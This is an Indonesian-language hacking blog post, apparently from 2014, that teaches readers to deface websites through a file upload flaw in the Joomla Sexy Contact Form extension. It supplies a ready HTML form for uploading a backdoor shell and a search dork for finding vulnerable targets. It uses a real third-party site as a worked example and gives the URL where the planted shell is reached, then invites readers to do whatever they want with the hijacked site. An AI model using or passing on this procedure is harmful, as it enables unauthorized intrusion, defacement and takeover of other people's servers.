Joomla Sexy Contact Form CSRF File Upload Vulnerability

0 0 Selasa, 28 Oktober 2014 Edit this post

Holla Semuanya ^w^ Kali ini Saya akan Membahas Tutorial Cara Deface Dengan Exploit  Joomla Sexy Contact Form CSRF File Upload Vul...





Holla Semuanya ^w^

 Kali ini Saya akan Membahas Tutorial Cara Deface Dengan Exploit Joomla Sexy Contact Form CSRF File Upload Vulnerability ^_^

 Ehh iya ~ Teknik ini Lagi Populer loh :D
Banyak Deface Sekarang yang Menggunakan Teknik ini :D
Heheh Oke Langsung Saja Lah :D

 Bahan2nya : 

 1. Script Cross Site Request Forgery (CSRF) :

 <form method="POST" action="http://www.Frieskavers.co.Li/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Copy Paste Script Di Atas ke Notepad ~ Save as .html 
*Yang Berwarna Merah Ganti Dengan Target Kamu* ^_^

2. Shell backd00r Tentunya ^_^

Oke Langsung Aja Cara Mainnya ~

Cari Dulu Targetnya Dengan Dork Berikut ^_^

inurl:/com_sexycontactform/  ~ com_sexycontactform/ site:gr 

Bisa Di Kembangkan Lagi Dorknya ^_^

Sekarang Exploitnya :

components/com_sexycontactform/fileupload/index.php

Vulnerability Check :


Setelah itu Copy Link Target Ke Script CSRF yang Tadi Sudah Kalian Buat ^_^

Contoh Target Saya ini ~ 

http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php

Jadinya Di Script CSRF Seperti ini :

<form method="POST" action="http://cookmeup.gr/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Ngerti Kan :D ?

Kalau ga Ngerti Lihat Gambar ini ~


Kalau Sudah, Buka Script CSRF tadi Lewat Browser Kamu ^_^
Lalu Upload Shell Kamu :D


Kalau Berhasil Nanti Akan Muncul Nama Shell Kalian Seperti ini :D 


Nah Sekarang Shell Acces nya Di Sini Kakak ^_^

Target.co.Li/components/com_sexycontactform/fileupload/files/YourShell.php

Jadinya Seperti ini :D

http://cookmeup.gr/components/com_sexycontactform/fileupload/files/frieskavers.php


Nah Habis itu Terserah Kalian Mau Diapain Tuh hehehee :v /

Yasudah DeCh Semoga Bermamfaat yaCh ^_^





Label:

SHARE:

Twitter Facebook Google Pinterest

COMMENTS

BLOGGER
DISQUS
Nama

Backd00r,2,Blogger Tutorial,2,Hacking,22,HTML,3,JKT48,7,News Update,7,Sharing,19,
ltr
item
[#] Cileungsi - Cyber [#]: Joomla Sexy Contact Form CSRF File Upload Vulnerability
Joomla Sexy Contact Form CSRF File Upload Vulnerability
http://www.crdsecurityresponse.co.za/wp-content/uploads/24-Hour-Security.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDRFXc25KZB6aosFt1srww9m5ESAakPD-zSGguBPFKEyB1pGuGFekQuTz0JEx4p9SWWssW4z8CFJauRGsbcjwqDAL-Xy64HzK7Q0MiBNEaSBYBevCnneZitQ2HmIXIrTG71ydccifowEo/s72-c/wkwk.jpg
[#] Cileungsi - Cyber [#]
http://cileungsi-cyber.blogspot.com/2014/10/joomla-sexy-contact-form-csrf-file.html
http://cileungsi-cyber.blogspot.com/
http://cileungsi-cyber.blogspot.com/
http://cileungsi-cyber.blogspot.com/2014/10/joomla-sexy-contact-form-csrf-file.html
true
3330362658088368293
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy